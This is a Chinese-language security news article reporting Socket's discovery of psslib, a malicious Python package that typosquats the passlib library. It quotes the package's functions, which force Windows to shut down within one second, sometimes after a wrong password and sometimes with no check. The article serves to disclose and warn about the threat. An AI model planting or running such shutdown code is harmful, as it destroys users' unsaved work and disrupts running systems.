Socket威脅研究團隊發現一個名為psslib的惡意Python包，該軟件包偽裝成提供密碼安全功能，實則會突然關閉Windows系統。這個由化名umaraq的威脅行為者開發的軟件包，是對知名密碼哈希工具庫passlib的拼寫錯誤仿冒（typosquatting）。passlib作為數百萬開發者信賴的工具庫，每月下載量超過890萬次。

惡意代碼工作機制

該惡意包通過名為spc()的函數偽裝密碼保護功能，使用easygui.enterbox()獲取用戶輸入。當輸入值與預設密碼不匹配時，會立即執行Windows關機命令（shutdown /s /t 1），使系統在一秒內關閉：

def spc(password):# 惡意代碼：輸入錯誤時強制系統關機if easygui.enterbox('enter password:-') != password:os.system("shutdown /s /t 1") # 1秒后關機

此外，psslib還包含兩個無需任何驗證即可關閉系統的函數：

def src():# 無需用戶輸入直接強制關機os.system("shutdown /s /t 1")def error(message):# 寫入錯誤信息后強制關機sys.stderr.write(message)os.system("shutdown /s /t 1")

攻擊影響與針對性

Socket指出，這種惡意軟件專門針對基于Windows的開發環境。當開發者在具有提升權限的環境中運行時，即使有限使用該庫也會立即危及系統。攻擊將導致：

• 未保存工作和數據丟失
• 打開的文件和數據庫損壞
• 運行中的服務中斷

雖然由于操作系統命令差異，該惡意負載在Linux或macOS上會無害失效，但其針對Windows的特性顯示出明確的攻擊意圖。Socket的AI掃描器已將該包標記為惡意軟件，因其具有破壞性系統關機行為。